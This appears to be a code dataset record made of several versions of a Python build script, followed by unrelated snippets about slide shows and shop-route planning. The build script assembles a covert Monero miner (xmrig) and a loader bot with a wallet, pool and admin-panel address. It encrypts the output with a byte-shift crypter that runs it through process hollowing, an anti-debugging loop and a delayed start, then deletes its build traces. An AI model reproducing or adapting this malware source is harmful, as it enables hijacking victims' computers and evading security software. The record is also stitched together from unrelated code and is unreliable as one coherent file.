sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, 
sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-4": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, 
sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-5": "import os, sys, time, random, subprocess\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%u%\", wallet)\n file = file.replace(\"%p%\", pool)\n file = file.replace(\"%w%\", ww)\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp\", \"w\") as w:\n w.write(file)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\ex.cs\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%l%\", logger)\n file = file.replace(\"%a%\", adminka)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\Program.cs\", \"w\") as w:\n w.write(file)\n\ndef writeBytes(key):\n with open(os.getcwd()+\"\\\\file.txt\", \"r\") as f:\n file = f.read()\n with open(os.getcwd()+\"\\\\Miner\\\\CryptRunPe\\\\winhost.cpp\", \"w\") as w:\n w.write(\"#include <stdafx.h>\\n#include \\\"process.h\\\"\\n #include \\\"memrun.h\\\"\\nusing namespace std;\\n\")\n with open(\"ex.txt\") as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\ndef compile(path, file):\n os.system(\"%windir%\\Microsoft.NET\\Framework\\\\v4.0.30319\\msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\t\ndef compileM(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\ndef compileR(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release /p:Platform=\\\"WIN32\\\"\")\ndef xcopy(path, out):\n try:\n with open(path, \"rb\") as f:\n file = f.read()\n with open(out, \"wb\") as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = '\\n\\\n #include <Windows.h>\\n\\\n #include <winternl.h>\\n\\\n #include <iostream>\\n\\\n #include <string>\\n\\\n #include <fstream>\\n\\\n using namespace std;\\n\\\n int main()\\n\\\n {\\n\\\n FILE * file = fopen(\"in.exe\", \"rb\");\\n\\\n if (file == NULL) return 0;\\n\\\n fseek(file, 0, SEEK_END);\\n\\\n long int size = ftell(file);\\n\\\n fclose(file);\\n\\\n file = fopen(\"in.exe\", \"rb\");\\n\\\n unsigned char * in = (unsigned char *)malloc(size);\\n\\\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] - 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"out.exe\", \"wb\");\\n\\\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] + 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"decr.exe\", \"wb\");\\n\\\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n return 0;\\n\\\n }\\n\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n os.system(\"g++ -o enc encoder.cpp\")\n os.system(\"C:\\Python27\\python.exe cv.py\")\n with open('file.txt', 'r') as r:\n with open(os.getcwd()+\"\\\\src\\\\crypter\\\\crypter.cpp\", \"w\") as w:\n txt = '\\\n #include \"stdafx.h\"\\n\\\n #include \"Crypter.h\"\\n\\\n #include <windows.h>\\n\\\n #include <winternl.h>\\n\\\n #pragma comment(lib,\"ws2_32.lib\")\\n\\\n #pragma comment(lib,\"ntdll.lib\")\\n\\\n '+ r.read() + '\\\n int RunPortableExecutable(void* Image) {\\n\\\n IMAGE_DOS_HEADER* DOSHeader;\\n\\\n IMAGE_NT_HEADERS* NtHeader;\\n\\\n IMAGE_SECTION_HEADER* SectionHeader;\\n\\\n PROCESS_INFORMATION PI;\\n\\\n STARTUPINFOA SI;\\n\\\n CONTEXT* CTX;\\n\\\n DWORD* ImageBase;\\n\\\n void* pImageBase;\\n\\\n int count;\\n\\\n char buffer[MAX_PATH];\\n\\\n GetModuleFileNameA(NULL, 
(LPSTR)buffer, MAX_PATH);\\n\\\n char *CurrentFilePath = buffer;\\n\\\n DOSHeader = PIMAGE_DOS_HEADER(Image);\\n\\\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\\n\\\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\\n\\\n ZeroMemory(&PI, sizeof(PI));\\n\\\n ZeroMemory(&SI, sizeof(SI));\\n\\\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\\n\\\n NtUnmapViewOfSection mNtUnmapViewOfSection;\\n\\\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\\n\\\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\\n\\\n CTX->ContextFlags = CONTEXT_FULL;\\n\\\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\\n\\\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\\n\\\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\\n\\\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\\n\\\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\\n\\\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\\n\\\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\\n\\\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\\n\\\n }\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\\n\\\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\\n\\\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\\n\\\n ResumeThread(PI.hThread);\\n\\\n return 0;\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\\n\\\n for (int i = 0; i < 550000; i++)\\n\\\n OutputDebugStringW(L\"\");\\n\\\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\\n\\\n unsigned char b = rawData[i] + 0x0%n%;\\n\\\n rawData[i] = b;\\n\\\n }\\n\\\n Sleep(((rand() % 5 + 1) + 5) * 1000);\\n\\\n RunPortableExecutable(rawData);\\n\\\n return 0;\\n\\\n }\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n compileM(os.getcwd()+\"\\\\src\\\\\", \"ConsoleApplication1\")\n xcopy(os.getcwd() + \"\\\\src\\\\Release\\\\Crypter.exe\", os.getcwd()+\"\\\\\"+name+\".exe\")\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\n\n\n\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd()+\"\\\\Bot\\\\\", \"LoaderBot\")\nxcopy(os.getcwd()+\"\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe\", \"Bot.exe\")\ncompileR(os.getcwd()+\"\\\\rig\\\\\", \"xmrig\")\nxcopy(os.getcwd()+\"\\\\rig\\\\Release\\\\xmrig.exe\", \"out.exe\")\ncrypt(\"test\", key)\nos.system(\"C:\\Python27\\python.exe cv.py\")\nwriteBytes(key)\ncompileM(os.getcwd()+\"\\\\Miner\\\\\", \"winhost\")\nxcopy(os.getcwd()+\"\\\\Miner\\\\Release\\\\winhost.exe\", \"in.exe\")\nprint(os.getcwd()+\"\\\\enc.exe\")\nsubprocess.call(os.getcwd()+\"\\\\enc.exe\")\ncrypt(\"winhost\", key)\n\nos.system(\"del file.txt\")\nos.system(\"del in.exe\")\nos.system(\"del out.exe\")\nos.system(\"del decr.exe\")\nos.system(\"del enc.exe\")\nos.system(\"del test.exe\")\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
from .feature import slide_show
def main(args=None):
    if args:
        slide_show(args[0])
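# Minimal hypothetical call (the path is an assumption, not from the package):
# main(["slides/demo.md"]) passes the first argument straight to slide_show().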
|
normal
|
{
"blob_id": "8680c033662a89ed6fc73e65ec544b93558c4208",
"index": 688,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(args=None):\n if args:\n slide_show(args[0])\n",
"step-3": "from .feature import slide_show\n\n\ndef main(args=None):\n if args:\n slide_show(args[0])\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import itertools
import numpy
import math
import psycopg2
import podatki

baza = podatki.baza
dom = podatki.preberi_lokacijo()  # home location [x, y]
seznam_trgovin = ["spar", "mercator", "tus", "hofer", "lidl"]
id_in_opis = podatki.id_izdelka_v_opis()
seznam_izdelkov = [el[0] for el in id_in_opis]  # e.g. ['cokolada', 'sladoled', ...]
mnozica_izdelkov = set(seznam_izdelkov)
trgovine_z_izdelki = podatki.trgovine_z_izdelki_f()  # dict: {'shop': ['id1', 'id2'], ...}
seznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]
'''
Unused earlier draft of the shop-combination search:

def zemljevid_trgovin(trgovine):
    sez = []
    for trgovina in trgovine:
        sez.append([trgovina, []])

def kombinacije_trgovin(seznam_izdelkov):
    sez_kombinacij = []
    for trgovina in trgovine:
        kombinacija = []
        izdelki = sez_izdelkov
        for izdelek in izdelki:
            if izdelek in trgovina:
                izdelki = izdelki.remove(izdelek)
'''
# For every subset of shop chains, check whether it can cover the whole basket
# and keep only the minimal covering combinations.
def kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):
    generator_kombinacij = (set(itertools.compress(seznam_trgovin, el))
                            for el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))
    kombinacije = []
    for mnozica_trgovin in generator_kombinacij:
        izdelki_kombinacije = set()
        for trgovina in mnozica_trgovin:
            for izdelek in trgovine_z_izdelki[trgovina]:
                izdelki_kombinacije.add(izdelek)  # every product available in this set of shops
        if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):
            kombinacije.append(mnozica_trgovin)
    # drop combinations that are supersets of another valid combination; the pass
    # runs twice because removing items while iterating can skip elements
    for _ in range(2):
        for kombinacija in kombinacije:
            for kombinacija2 in kombinacije:
                if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:
                    kombinacije.remove(kombinacija2)
                elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:
                    kombinacije.remove(kombinacija)
    return kombinacije
def razdalja(vozlisce1, vozlisce2):
    # straight-line (Euclidean) distance between two [x, y] points
    return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] - vozlisce1[0]) ** 2)

# dom = [x, y]
# For one combination of shop chains, pick one location per chain so that the
# round trip home -> shops -> home is as short as possible (brute force over
# every choice of locations).
def doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):
    skupine = []  # location groups, one list per shop chain
    poti = []
    for trgovina in kombinacija:
        skupine.append(podatki.lokacije(slovar_koordinat, trgovina))
    for izbira in itertools.product(*skupine):  # one location from each chain
        vozlisca = [dom] + list(izbira)
        dolzina = sum(razdalja(vozlisca[i], vozlisca[i + 1]) for i in range(len(vozlisca) - 1))
        dolzina += razdalja(vozlisca[-1], dom)  # return home
        poti.append([vozlisca, dolzina])
    dolzine = [el[1] for el in poti]
    if dolzine == []:
        print("Nakupa ni mogoče opraviti.")  # "The purchase cannot be completed."
        return None
    mini = numpy.argmin(dolzine)
